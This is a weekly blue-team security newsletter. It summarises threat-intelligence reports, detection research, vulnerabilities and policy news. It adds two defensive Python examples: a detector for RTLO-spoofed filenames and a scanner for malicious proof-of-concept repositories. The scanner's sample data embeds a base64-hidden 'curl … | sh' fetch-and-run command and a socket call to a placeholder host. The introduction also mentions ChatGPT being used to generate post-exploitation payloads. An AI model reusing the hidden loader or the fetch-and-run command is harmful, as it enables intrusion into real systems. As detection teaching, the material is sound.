

Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week it has all been about people playing with OpenAI and ChatGPT on social media. Well, not entirely, but a lot. ChatGPT, prompt engineering and the underlying large language models are showing value in cyber scenarios in ways people likely didn’t envisage. Some examples from the fun this week include having it generate post-exploitation payloads, having it generate Yara detection rules and finally having it boost reverse engineering productivity. Anyway, the fun will subside, but we have seen a glimpse of the future.
In the high-level this week:
NSA cyber director talks threats, opportunities - Rob Joyce delivers the wisdom.
Before the Invasion: Hunt Forward Operations in Ukraine - US basically say they knew what was coming so started work early - U.S. joint forces, in close cooperation with the government of Ukraine, conducted defensive cyber operations alongside Ukrainian Cyber Command personnel from December 2021 to March 2022, as part of a wider effort to contribute to enhancing the cyber resiliency in national critical networks.
Accountability and Multilateralism in Israel’s Approach to Cyber Diplomacy - Israel’s cyber co-ordinator from their Ministry of Foreign Affairs gives insights into the thinking and the machine that some are envious of.
EU decides to strengthen cybersecurity and resilience across the Union: Council adopts new legislation - NIS2 (or v2) is a thing i.e. security of network and information systems.
Cyber laws updated to boost UK’s resilience against online attacks - because the supply chain wasn’t always being entirely transparent - Outsourced IT providers will be brought into scope of cyber regulations to strengthen UK supply chains.
FinCEN Analysis Reveals Ransomware Reporting in Bank Secrecy Act (BSA) Filings Increased Significantly During the Second Half of 2021 - Roughly 75 percent of the ransomware-related incidents reported to FinCEN during the second half of 2021 pertained to Russia-related ransomware variants - $1.2 billion in suspected payments in 2021
UK Police forces overwhelmed and ineffective when it comes to digital forensics - from HM Inspectorate of Constabulary and Fire & Rescue Services. A harsh but interesting report on the challenges of scaling digital forensics in law enforcement.
NAIC Report Shows Premiums Grew 61% as Cyberthreats Rose in 2021 - released late in October but I only just became aware of it. Data from National Association of Insurance Commissioners (NAIC) in the US. Includes loss data - the net is there are clearly some suboptimal actuaries in the industry.
Latest draft report from the EU’s Committee of Inquiry to investigate the use of Pegasus and equivalent surveillance spyware - says "the discovery, sharing and exploitation of vulnerabilities have to be regulated" - but doesn't detail how.
A Hacked Newsroom Brings a Spyware Maker to U.S. Court - The New Yorker does what it does best.
El Faro Journalists, Knight Institute Sue NSO Group Over Spyware - related to the above - 15 journalists and other members of El Faro, one of the leading sources of independent news in Central America, today filed suit in U.S. federal court against NSO Group
Flight of the Predator - Jet linked to Israeli spyware tycoon delivers surveillance tech from the EU to notorious Sudanese militia - not a great look
2023 China Security Report from the Japanese National Institute for Defence Studies - "concern about acts which combine cyberattacks and information warfare. They are seeing the emergence of an “APT + InfoOp” model combining information operations with hack and leak"
Simulated Internal Cyber Attack Gained Control of Critical Census Bureau Systems - a red team report released by the US Department of Commerce Office of Inspector General - Office of Audit and Evaluation. Could you imagine a world where all red team reports had to be posted on the Internet like this? Radical transparency..
LastPass suffered a r.e. intrusion building on from their previous breach - interesting read and a lesson to the world on how to transparently deal with cyber disclosures 👏
Reflections this week are driven by the joy of interacting with those who don’t live cyber but hold enormous power and authority to help with the solutions. As I mentioned last week, I was in the UK’s Parliament this week to give evidence on ransomware, and I’ve been reflecting on how we ended up being there (video here | transcript here) …
This isn’t a sole endeavour. What sits behind it in my day job is a public affairs team of Kat and Ro (who are world class) which sits historically within the Group CTO’s portfolio. Now you might ask why public affairs sits with the CTO? Well, I championed it as a strategic tool for the firm to achieve our ultimate mission of making the world safer and more secure, but with a technical edge and focus. Our endeavours started with Computer Misuse Act reform and then became much broader in terms of our aspirations. We saw there was a gap for highly technical individuals to contribute strategically to government thinking and policy whilst bringing an evidence base, in pursuit of cyber as a science and overall resilience.
By engaging in this manner we aspired to influence future horizons, help shape government thinking and policy with evidence and in doing so maybe avoid the mistakes of the past and head off those of the future.
The journey has been amazing with various colleagues engaged in various ways to support some really knotty issues.
Anyway, long way of saying if the opportunity presents itself please do go for it. Our various countries need diverse expertise, perspectives and voices if we are to achieve our aims.
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
RansomBoggs: New ransomware targeting Ukraine
Russia being active in Ukraine with “ransomware” deployed by what is intimated to be a state actor, and which is in reality a wiper.
First detected on November 21st. Depending on the variant, RansomBoggs is detected by [our] products as MSIL/Filecoder.Sullivan.A and MSIL/Filecoder.RansomBoggs.A.
There are similarities with previous attacks conducted by Sandworm: a PowerShell script used to distribute the .NET ransomware from the domain controller
https://www.welivesecurity.com/2022/11/28/ransomboggs-new-ransomware-ukraine/
Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia
Ryan Tomcik, John Wolfram, Tommy Dacanay and Geoff Ackerman outline a campaign which shows an element of sophistication with regard to capability, distribution and also the use of signed binaries. This is not a toy..
[We] recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines. Mandiant tracks this activity as UNC4191 and we assess it has a China nexus.
Following initial infection via USB devices, the threat actor leveraged legitimately signed binaries to side-load malware, including three new families we refer to as MISTCLOAK, DARKDEW, and BLUEHAZE
https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia
New details on commercial spyware vendor Variston
Clement Lecigne and Benoit Sevens detail a Spanish commercial supplier of intrusion software which makes a change from Israel, Germany etc.
Note they have a focus on n-days. With the EU hyper focusing on the 0-days you can see how reality versus the theory diverge quite quickly. No we can’t regulate n-days..
[We have] been tracking the activities of commercial spyware vendors for years, using our research to improve the safety and security of Google’s products and share intelligence with our industry peers. TAG’s research underscores that the commercial surveillance industry is thriving and has expanded significantly in recent years, creating risk for Internet users around the globe. Commercial spyware puts advanced surveillance capabilities in the hands of governments who use them to spy on journalists, human rights activists, political opposition and dissidents. Google and TAG are committed to disrupting these threats, protecting users, and raising awareness of the risks posed by the growing commercial spyware industry.
Continuing this work, today, we’re sharing findings on an exploitation framework with likely ties to Variston IT, a company in Barcelona, Spain that claims to be a provider of custom security solutions. Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox and Microsoft Defender and provides all the tools necessary to deploy a payload to a target device.
https://blog.google/threat-analysis-group/new-details-on-commercial-spyware-vendor-variston/
Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank
Insight into an Iranian phishing campaign, the domains are really quite basic.
This report covers threat activity that is highly likely related to a broader campaign led by a suspected Iran-nexus threat activity group, TAG-56. This research is pertinent to individuals and organizations that cover Iranian cyber operations, IT security employees, members of think tanks, non-governmental organizations, journalists, and governments.
In early November 2022, [we] identified a phishing and follow-on credential theft attack highly likely led by an Iran-nexus threat activity group directed against the US-based Washington Institute think tank. The credential theft component masquerades as a Microsoft registration form for the 2022 Sir Bani Yas Forum hosted by the government of the United Arab Emirates (UAE).
Who’s swimming in South Korean waters? Meet ScarCruft’s Dolphin
Filip Jurčacko discusses a North Korean campaign active in South Korea. This is the upper end of their operations which is why they selectively deploy it.
[We] have analyzed a previously unreported backdoor used by the ScarCruft APT group. The backdoor, which we named Dolphin, has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers. Its functionality is reserved for selected targets, to which the backdoor is deployed after initial compromise using less advanced malware. In line with other ScarCruft tools, Dolphin abuses cloud storage services – specifically Google Drive – for C&C communication.
[Our] researchers analyzed Dolphin, a previously unreported backdoor used by the ScarCruft APT group.
Dolphin is deployed on selected targets only; it searches the drives of compromised systems for interesting files and exfiltrates them to Google Drive.
The backdoor was used as the final payload of a multistage attack in early 2021, involving a watering-hole attack on a South Korean online newspaper, an Internet Explorer exploit, and another ScarCruft backdoor, named BLUELIGHT.
Since the initial discovery of Dolphin in April 2021, [our] researchers have observed multiple versions of the backdoor, in which the threat actors improved the backdoor’s capabilities and made attempts to evade detection.
A notable feature of earlier Dolphin versions we analyzed is the ability to modify the settings of victims’ signed-in Google and Gmail accounts to lower their security.
https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/
Analysis of APT-C-55 (Kimsuky) attacks using IBM security products as bait
Chinese reporting on a North Korean actor who has adopted ISO tradecraft to circumvent Mark of the Web (MOTW). The fact they are dressing it up as IBM security products is just 👹
BabyShark is a Microsoft Visual Basic (VB) script-based malware family designed to gather sensitive information. The component was first discovered in 2019 and used to target US national security think tanks, and has since been used for espionage on nuclear security and national security issues on the Korean Peninsula. Recently, 360 Advanced Threat Research Institute captured an attack activity in which the APT-C-55 (Kimsuky) organization used IBM's security products as bait to deliver BabyShark attack components.
In this attack, the attacker delivered a malicious ISO file to the target, installed IBM security products through BAT scripts, and at the same time used BAT scripts to download malicious payloads and collect target host information.
The attack payload and sample communication format used in this attack match the characteristics of BabyShark components, so we attribute this attack to the APT-C-55 (Kimsuky) organization.
Malicious code distributed with disguised file names (RIGHT-TO-LEFT OVERRIDE)
South Korean reporting on a stealer campaign (i.e. likely criminal in this case) using a feature for non-western layouts (i.e. right-to-left) to mask the actual file type. This tradecraft isn’t new and has been known about in the red team/defensive communities for over a decade.
In the method using RTLO, as a result of checking the detected malicious code through the company's ASD infrastructure, not only the disguised solution (.sln) file but also compressed files, test files, and video files existed. The most frequently detected distribution methods were files disguised as adult videos and movies, such as SCR.pm4, scr.vkm, and scr.iva, and it was confirmed that exe.rar, which was disguised as a utility program, was distributed using torrents.
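To make the RTLO trick concrete from the defender's side, here is an added example (mine, not code from the post or from the ASEC report) that inspects filenames for Unicode bidirectional override characters, approximates how a file manager would display the name, and compares the displayed extension with the real one. The filenames and the executable-extension list are constructed for the example.

```python
import unicodedata

# Unicode bidirectional controls that can reorder how a filename is displayed.
# U+202E (RIGHT-TO-LEFT OVERRIDE) is the one abused in the campaign above.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
}
RLO, PDF = "\u202e", "\u202c"

# Constructed list of extensions that execute when double-clicked (not exhaustive).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "lnk", "hta", "msi"}


def strip_controls(text: str) -> str:
    """Return the text as the filesystem stores it, minus invisible bidi controls."""
    return "".join(c for c in text if c not in BIDI_CONTROLS)


def rendered_name(name: str) -> str:
    """Approximate the displayed form: text after an RLO is shown reversed until a PDF
    (or end of string). Good enough for triage; real bidi layout is more involved."""
    if RLO not in name:
        return strip_controls(name)
    head, _, tail = name.partition(RLO)
    overridden, _, rest = tail.partition(PDF)
    return strip_controls(head) + strip_controls(overridden)[::-1] + strip_controls(rest)


def extension_of(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def analyse(name: str) -> dict:
    """Report bidi controls present, the real vs displayed extension, and a verdict.
    Only override/embedding controls are flagged, so ordinary right-to-left
    filenames (Arabic, Hebrew) without controls are not treated as suspicious."""
    controls = [
        (idx, f"U+{ord(c):04X}", unicodedata.name(c))
        for idx, c in enumerate(name)
        if c in BIDI_CONTROLS
    ]
    real_ext = extension_of(strip_controls(name))
    shown = rendered_name(name)
    shown_ext = extension_of(shown)
    return {
        "controls": controls,
        "real_extension": real_ext,
        "displayed_as": shown,
        "displayed_extension": shown_ext,
        # Suspicious when a control character makes an executable look like something else.
        "suspicious": bool(controls) and real_ext in EXECUTABLE_EXTS and real_ext != shown_ext,
    }


if __name__ == "__main__":
    # Constructed samples mirroring the report: a .scr shown as .mp4, an .exe shown as .rar.
    samples = [
        "report.pdf",
        "holiday_video_" + RLO + "4pm.scr",
        "setup_utility_" + RLO + "rar.exe",
    ]
    for sample in samples:
        result = analyse(sample)
        print(f"{result['displayed_as']!r}: real .{result['real_extension']} "
              f"suspicious={result['suspicious']} controls={result['controls']}")
```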
Decentralized Robbery: Dissecting the Nomad Bridge Hack and Following the Money
Randi Eitzman and Joe Dobson provide some great analysis of digital assets being punted around the blockchain. In doing so they likely make Chainalysis and Elliptic a little sad, as they erode some of their unique selling point with regard to analysis capability using common off-the-shelf software.
[We] take a deeper look into how the Nomad bridge smart-contract was exploited.
We assess with high confidence that the addresses belonging to Group D (represented in black) belong to the same actor/group (Figure 10), and the amount stolen from the Nomad bridge totals around $54,506,000 in USD value at the time of analysis. The on-chain analysis shows the actor/group leveraging several decentralized swapping pools (liquidity pools found on decentralized exchanges used for token swapping), specifically, OrionPool, Uniswap, and Curve, to exchange the stolen funds for other tokens. The actor/group then sends some funds through TornadoCash and some into two separate deposit addresses (represented in purple). Out of the roughly $54 million stolen in the heist, approximately $50 million reside across the two purple deposit addresses.
https://www.mandiant.com/resources/blog/dissecting-nomad-bridge-hack
Emotet Strikes Again
DFIR Report doing what they do best with a retrospective from the summer. The execution chain is super complex.
In June of 2022, we observed a threat actor gaining access to an environment via Emotet and operating over an eight-day period. During this time period, multiple rounds of enumeration and lateral movement occurred using Cobalt Strike. Remote access tools were used for command and control, such as Tactical RMM and Anydesk. The threat actors' final actions included data exfiltration using Rclone and domain-wide deployment of Quantum Ransomware.
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
Discovery
How we find and understand the latent compromises within our environments.
Identifying and Defending Against QakBot's Evolving TTPs
Scott Small shows how criminals can quickly evolve their tradecraft based on public reporting and bring it into production to support their campaigns.
https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps
Get-InjectedThreadEx
John Uhlmann discusses detecting thread creation trampolines on Windows. This is really useful and a great research base to help impose further cost on adversaries commercial or otherwise.
The question I have is when we will start providing the same level of quality analysis and understanding for Linux and macOS etc.
At a high level, this approach detects threads created with a user start address in unbacked executable memory. Unbacked executable memory itself is quite normal in many processes such as those that do just-in-time (JIT) compilation of bytecode or scripts like .NET or javascript. However, that JIT’d code rarely manages its own threads – usually that is handled by the runtime or engine.
https://www.elastic.co/security-labs/get-injectedthreadex-detection-thread-creation-trampolines
BERT-Log
Song Chen and Hai Liao present some academic work on anomaly detection for system logs based on a pre-trained language model. This is excellent work and has a whole host of possible applications..
Raw log messages are unstructured, containing text in many different formats. It is hard to detect numerous anomalies based on unstructured logs. This study proposes a BERT-Log method which can detect log anomalies automatically based on the BERT pre-training language model. It can better capture semantic information from raw logs than previous LSTM, Bi-LSTM and Word2Vec methods. BERT-Log consists of an event template extractor, a log semantic encoder, and a log anomaly classifier. We evaluated our proposed method on two public log datasets: the HDFS dataset and the BGL dataset. The results show that the BERT-Log-based method achieves better performance than other anomaly detection methods.
https://www.tandfonline.com/doi/full/10.1080/08839514.2022.2145642
Fibratus 1.8.0
Nedim Šabić provides the latest release that comes with detection rules. This tool has been developed for a while now and is uber powerful. The detection rules as noted focus on specific tradecraft but you can see how they could be extended/applied to a host of other activity.
A tool for Windows kernel tracing and exploration focusing on runtime threat detection and prevention. Starting from this version, Fibratus is distributed with a catalog of detection rules built on top of the industry-recognized MITRE ATT&CK framework. This initial catalog is focused on credential access, defense evasion, and initial access tactics.
https://github.com/rabbitstack/fibratus/releases/tag/v1.8.0
Fusing Feature Engineering and Deep Learning
Daniel Gibert’s code is 6 months old but I highlight due to the performance value it brings.
This is the code implementing our approach for the paper "Fusing Feature Engineering and Deep Learning: A Case Study for Malware Classification". Using it, you can train the XGBoost model that achieved the highest 10-fold cross validation accuracy and lowest logarithmic loss on the Microsoft Malware Classification Challenge dataset..
IDAPython Script to decode NightHawk strings
Karsten Hahn releases this little work aid.
https://github.com/struppigel/hedgehog-tools/blob/main/nighthawk_str_decoder.py
Defence
How we proactively defend our environments.
Building Policy Gate for DevSecOps using Open Policy Agent
Nikhil Mittal shows how to leverage OPA to implement Policy as Code. This is how we scale. I very much believe in Policy as Code as a huge force multiplier.
We decided to build a security policy engine using OPA to control the data produced by open-source tools, to act as a gatekeeper so we can effectively control the success or failure of the security workflow along with managing exceptions.
Multi-Key Total Memory Encryption on Windows 11 22H2
Jin Lin details a feature in Windows 11 which will kill some DMA attacks.
VM memory encryption with Intel’s Total Memory Encryption – Multi Key (TME-MK), providing hardware accelerated encryption of DRAM. With the latest Intel 12th Gen Core CPUs (Alder Lake) offering this capability, we are delighted to extend support in Windows 11 22H2 for TME-MK.
Accidentally Crashing a Botnet
Larry Cashdollar creates temptation for law enforcement who must not press enter.. or could go right ahead with a warrant!
[Our] researchers have continued their research on KmsdBot, a cryptomining botnet, and witnessed the authors accidentally crash it.
In our controlled environment, we were able to send commands to the bot to test its functionality and attack signatures.
As part of this analysis, a syntax error caused the bot to stop sending commands, effectively killing the botnet.
Since this particular botnet doesn’t seek persistence on a system, it can only continue its mission if it reinfects the system.
https://www.akamai.com/blog/security-research/kmsdbot-part-two-crashing-a-botnet
Vulnerability
Our attack surface.
Cisco Secure Email Gateways can easily be circumvented
An anonymous soul releases this vulnerability into the wild. Interestingly, it once again highlights that if you know the spec better than the software architecture and/or engineering teams and can think adversarially, you win.
Cisco Secure Email Gateways, formerly known as Cisco Ironport Email Security Appliances, that are configured to detect malicious email attachments, can easily be circumvented. A remote attacker can leverage error tolerance and different MIME decoding capabilities of email clients, compared with the gateway, to evade detection of malicious payloads by anti-virus components on the gateway.
https://seclists.org/fulldisclosure/2022/Nov/2
Unauthorised Changes to Secure Boot Settings for Acer
Affected Models: Acer Aspire A315-22, A115-21, A315-22G, Extensa EX215-21 and EX215-21G and oof!
Researchers have identified a vulnerability that may allow changes to Secure Boot settings by creating NVRAM variables (actual value of the variable is not important, only the existence is checked by the affected firmware drivers).
By disabling the Secure Boot feature, an attacker can load their own unsigned malicious bootloader to allow absolute control over the OS loading process. This can allow them to disable or bypass protections to silently deploy their own payloads with the system privileges.
Offense
Attack capability, techniques and tradecraft.
Making unphishable 2FA phishable
Matthew Garrett shows how RFC 8628 enables you to phish even when WebAuthn is present. Great work..
https://mjg59.dreamwidth.org/62175.html
Maintaining persistent access in a SaaS-first world
Luke Jennings from Push Security outlines four persistence mechanisms in a cloud-first world. All very useful for DFIR and SOC teams to be aware of.
OAuth attack #1: Custom OAuth app integration
OAuth attack #2: SaaS platform integration
OAuth attack #3: Legitimate desktop/mobile app impersonation
Document-sharing links
https://pushsecurity.com/blog/maintaining-persistent-access-in-a-saas-first-world/
Exploitation
What is being exploited.
Android platform signing keys compromised
Google discloses this but without the details of which platforms are affected.
https://bugs.chromium.org/p/apvi/issues/detail?id=100
CVE-2022-4135: Google is aware that an exploit exists in the wild for Chrome
Thank goodness for auto updates. Enterprises make sure you patch..
https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop_24.html
How security professionals are being attacked
Soufian El Yadmani, Robin The and Olga Gadyatskaya show why you wouldn’t want to be the CISO of a large cyber security consultancy.
A study of malicious CVE proof of concept exploits in GitHub
In this work we investigate PoCs shared on GitHub for known vulnerabilities discovered in 2017-2021. We discovered that not all PoCs are trustworthy. Some proof-of-concepts are fake (i.e., they do not actually offer PoC functionality), or even malicious: e.g., they attempt to exfiltrate data from the system they are being run on, or they try to install malware on this system.
To address this issue, we have proposed an approach to detect if a PoC is malicious. Our approach relies on detecting the symptoms we have observed in the collected dataset, for example, calls to malicious IP addresses, encoded malicious code, or included Trojanized binaries. With this approach, we have discovered 4893 malicious repositories out of 47313 repositories that have been downloaded and checked (i.e., 10.3% of the studied repositories have symptoms of malicious intent). This figure shows a worrying prevalence of dangerous malicious PoCs among the exploit code distributed on GitHub.
https://arxiv.org/abs/2210.08374
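The three symptoms the paper lists (calls to malicious IP addresses, encoded code, bundled binaries) lend themselves to a static pre-run triage. The following is an added example of mine, not the authors' tooling; the repository contents, the indicator list and the "code-like" tokens are all constructed placeholders, so treat the output as leads for an analyst rather than a verdict.

```python
import base64
import ipaddress
import re
from typing import Dict, List, Union

# Constructed placeholder standing in for a real threat-intelligence feed.
KNOWN_BAD_IPS = {"203.0.113.25"}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Long runs of base64 alphabet; short tokens produce too many false positives.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Tokens that suggest a decoded blob is code or a download instruction, not data.
CODE_TOKENS = ("exec(", "eval(", "os.system", "powershell", "/bin/sh", "curl ", "wget ", "http://", "https://")
BINARY_MAGIC = {b"MZ": "PE executable", b"\x7fELF": "ELF executable"}


def scan_text(path: str, text: str) -> List[str]:
    """Flag hardcoded IPs (blocklisted or simply public) and base64 blobs that decode to code."""
    findings = []
    for ip in sorted(set(IP_RE.findall(text))):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # e.g. a version string such as 10.0.0.256
        if ip in KNOWN_BAD_IPS:
            findings.append(f"{path}: contacts known-bad IP {ip}")
        elif not (addr.is_private or addr.is_loopback or addr.is_link_local):
            findings.append(f"{path}: hardcoded public IP {ip} (review)")
    for blob in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore").lower()
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if any(tok in decoded for tok in CODE_TOKENS):
            findings.append(f"{path}: base64 blob decodes to code-like content")
    return findings


def scan_binary(path: str, data: bytes) -> List[str]:
    """A PoC repo shipping compiled executables deserves a look before anything is run."""
    for magic, kind in BINARY_MAGIC.items():
        if data.startswith(magic):
            return [f"{path}: bundled {kind} (review)"]
    return []


def scan_repo(files: Dict[str, Union[str, bytes]]) -> List[str]:
    findings: List[str] = []
    for path, content in files.items():
        if isinstance(content, bytes):
            findings.extend(scan_binary(path, content))
        else:
            findings.extend(scan_text(path, content))
    return findings


# Constructed sample repository exhibiting all three symptoms (not from the paper's dataset).
_HIDDEN = base64.b64encode(b"import os; os.system('curl http://203.0.113.25/x | sh')").decode()
SAMPLE_REPO: Dict[str, Union[str, bytes]] = {
    "README.md": "# CVE-XXXX-XXXX PoC\nRun exploit.py against the target.\n",
    "exploit.py": "import socket\ns = socket.create_connection(('203.0.113.25', 4444))\n",
    "loader.py": f"import base64\nexec(base64.b64decode('{_HIDDEN}'))\n",
    "helper.exe": b"MZ\x90\x00" + b"\x00" * 60,
}

if __name__ == "__main__":
    for line in scan_repo(SAMPLE_REPO):
        print(line)
```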
Tooling and Techniques
Low level tooling for attack and defence researchers.
peafl64
Static Binary Instrumentation tool for Windows x64 executables
https://github.com/Sentinel-One/peafl64
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Threat Insights Report Q3 2022 - malware delivery method focus
December 2022 Army Magazine - featuring the evolution of Army Cyber Command
Dissecting Tensor Cores via Microbenchmarks: Latency, Throughput and Numeric Behaviours
Password Portfolios and the Finite-Effort User: Sustainably Managing Large Numbers of Accounts - older paper but worth a reminder on why humans can’t remember all of those random passwords.
The Effect of International Proposals for Monitoring Obligations on End-to-End Encryption
scantxt - scanning mechanisms for opt-in/out, identification, verification, notification, and reporting
Sludge for Good: Slowing and Imposing Costs on Cyber Attackers - point of note is there is no data on efficacy
Related, by a different team, is Examining the Efficacy of Decoy-based and Psychological Cyber Deception, which has a supporting article from January 2022
That’s all folks.. until next week..
Bluepurple Pulse: week ending December 4th
Great post Ollie! Excited for the ChatGPT stuff and its applications for red teaming ;)